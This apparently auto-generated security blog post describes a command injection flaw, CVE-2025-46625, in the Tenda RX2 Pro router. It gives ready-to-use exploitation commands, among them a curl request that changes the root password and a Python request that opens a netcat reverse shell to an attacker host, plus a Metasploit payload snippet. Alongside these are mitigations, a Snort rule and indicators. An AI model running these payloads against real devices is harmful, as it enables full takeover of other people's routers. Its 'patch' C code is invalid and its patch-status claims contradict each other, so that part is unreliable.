Tenda RX2 Pro, Command Injection, CVE-2025-46625 (Critical)

By /

Listen to this Post

How CVE-2025-46625 Works

The vulnerability exists in the `setLanCfg` API endpoint of the Tenda RX2 Pro’s HTTP server (httpd). Due to improper input validation, an authenticated attacker can inject malicious commands into the LAN configuration parameters. When these commands are processed and saved to the device’s persistent configuration, they execute with root privileges. The crafted payload bypasses input filters by embedding OS commands within legitimate HTTP POST parameters, which are then executed via system() calls in the backend. This allows persistent root access even after device reboots since the malicious commands remain in the configuration file.

DailyCVE Form

Platform: Tenda RX2 Pro
Version: 16.03.30.14
Vulnerability: Command Injection
Severity: Critical
Date: 05/27/2025

Prediction: Patch expected by 07/15/2025

What Undercode Say:

Exploitation Commands

curl -X POST -d "lanIP=192.168.1.1;$(echo 'root:toor' | chpasswd)" http://target_ip/goform/setLanCfg

import requests
payload = {"lanIP": "1.1.1.1; nc -e /bin/sh attacker_ip 4444"}
requests.post("http://target_ip/goform/setLanCfg", data=payload)

Mitigation Steps

  1. Block unauthorized access to `/goform/setLanCfg` via firewall rules.
  2. Apply input sanitization for special characters (;, &, |) in the `lanIP` parameter.

3. Use firmware version 16.03.30.15 or later (post-patch).

Detection Script

grep -r "system(\"" /www/cgi-bin/

Patch Analysis

The vendor mitigates this by:

// Old vulnerable code
system(printf("ifconfig br0 %s", lanIP));
// Patched version
sanitize_input(lanIP);
execve("/sbin/ifconfig", ["br0", lanIP], NULL);

Network Indicators

  • HTTP POST requests containing ;, &&, or backticks in `lanIP` parameter.
  • Unusual outbound connections from the router to external IPs.

Forensic Artifacts

  • Modified `/etc/config/lan_cfg` with embedded commands.
  • Suspicious entries in /var/log/httpd.log.

Metasploit Module Snippet

'Payload' => { 'lanIP' => "%s; echo '{payload.encoded}' > /tmp/e" }

Snort Rule

alert tcp any any -> $HOME_NET 80 (msg:"Tenda RX2 Pro CVE-2025-46625 Exploit"; content:"POST /goform/setLanCfg"; pcre:"/lanIP=[^&][;|&]/"; sid:100025;)

Firmware Downgrade Prevention

fw_setenv allow_downgrade 0

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top